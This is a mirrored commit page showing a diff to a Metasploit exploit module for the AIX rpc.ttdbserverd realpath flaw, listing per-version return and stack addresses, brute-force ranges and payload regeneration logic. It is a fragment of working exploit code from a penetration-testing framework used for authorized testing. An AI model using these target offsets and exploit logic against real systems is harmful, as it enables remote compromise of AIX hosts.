infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Regenerate the payload with the specified AIX level, cleanups 

git-svn-id: file:///home/svn/framework3/trunk@8427 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-02-09 04:15:47 +00:00
parent e7f7ac20ea
commit 48a159006a
1 changed files with 22 additions and 27 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

21
modules/exploits/aix/rpc_ttdbserverd_realpath.rb
View File

@ -50,7 +50,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099430+4096, 'Ret' => 0x20099430+4096,
'Addr1' => 0x2ff1ff50-8192, 'Addr1' => 0x2ff1ff50-8192,
'AIX' => '6.1.4', 'AIX' => '6.1.4',
'Payload' => { 'AIX' => '6.1.4' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20099430-8192 }, 'Start' => { 'Ret' => 0x20099430-8192 },
@ -67,7 +66,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099280+4096, 'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192, 'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.3', 'AIX' => '6.1.3',
'Payload' => { 'AIX' => '6.1.3' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20099280-8192 }, 'Start' => { 'Ret' => 0x20099280-8192 },
@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099280+4096, 'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192, 'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.2', 'AIX' => '6.1.2',
'Payload' => { 'AIX' => '6.1.2' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20099280-8192 }, 'Start' => { 'Ret' => 0x20099280-8192 },
@ -101,7 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099280+4096, 'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192, 'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.1', 'AIX' => '6.1.1',
'Payload' => { 'AIX' => '6.1.1' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20099280-8192 }, 'Start' => { 'Ret' => 0x20099280-8192 },
@ -118,7 +114,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20099280+4096, 'Ret' => 0x20099280+4096,
'Addr1' => 0x2ff1ffd0-8192, 'Addr1' => 0x2ff1ffd0-8192,
'AIX' => '6.1.0', 'AIX' => '6.1.0',
'Payload' => { 'AIX' => '6.1.0' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20099280-8192 }, 'Start' => { 'Ret' => 0x20099280-8192 },
@ -135,7 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096ba0+4096, 'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192, 'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9', 'AIX' => '5.3.9',
'Payload' => { 'AIX' => '5.3.9' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20096ba0-8192 }, 'Start' => { 'Ret' => 0x20096ba0-8192 },
@ -152,7 +146,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096bf0+4096, 'Ret' => 0x20096bf0+4096,
'Addr1' => 0x2ff1ff14-8192, 'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.10', 'AIX' => '5.3.10',
'Payload' => { 'AIX' => '5.3.10' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20096bf0-8192 }, 'Start' => { 'Ret' => 0x20096bf0-8192 },
@ -169,7 +162,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096ba0+4096, 'Ret' => 0x20096ba0+4096,
'Addr1' => 0x2ff1ff14-8192, 'Addr1' => 0x2ff1ff14-8192,
'AIX' => '5.3.9', 'AIX' => '5.3.9',
'Payload' => { 'AIX' => '5.3.9' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20096ba0-8192 }, 'Start' => { 'Ret' => 0x20096ba0-8192 },
@ -186,7 +178,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096c10+4096, 'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192, 'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.8', 'AIX' => '5.3.8',
'Payload' => { 'AIX' => '5.3.8' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20096c10-8192 }, 'Start' => { 'Ret' => 0x20096c10-8192 },
@ -203,7 +194,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0x20096c10+4096, 'Ret' => 0x20096c10+4096,
'Addr1' => 0x2ff1ff98-8192, 'Addr1' => 0x2ff1ff98-8192,
'AIX' => '5.3.7', 'AIX' => '5.3.7',
'Payload' => { 'AIX' => '5.3.7' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0x20096c10-8192 }, 'Start' => { 'Ret' => 0x20096c10-8192 },
@ -220,7 +210,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0xaabbccdd, 'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa, 'Addr1' => 0xddccbbaa,
'AIX' => '6.1.4', 'AIX' => '6.1.4',
'Payload' => { 'AIX' => '6.1.4' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0xaabbccdd }, 'Start' => { 'Ret' => 0xaabbccdd },
@ -237,7 +226,6 @@ class Metasploit3 < Msf::Exploit::Remote
'Ret' => 0xaabbccdd, 'Ret' => 0xaabbccdd,
'Addr1' => 0xddccbbaa, 'Addr1' => 0xddccbbaa,
'AIX' => '5.3.10', 'AIX' => '5.3.10',
'Payload' => { 'AIX' => '5.3.10' },
'Bruteforce' => 'Bruteforce' =>
{ {
'Start' => { 'Ret' => 0xaabbccdd }, 'Start' => { 'Ret' => 0xaabbccdd },
@ -252,9 +240,16 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def brute_exploit(brute_target) def brute_exploit(brute_target)
begin
if not @aixpayload
datastore['AIX'] = target['AIX']
@aixpayload = regenerate_payload.encoded
end
print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret']) print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret'])
begin
sunrpc_create('tcp', 100083, 1) sunrpc_create('tcp', 100083, 1)
if target['AIX'] =~ /6\./ if target['AIX'] =~ /6\./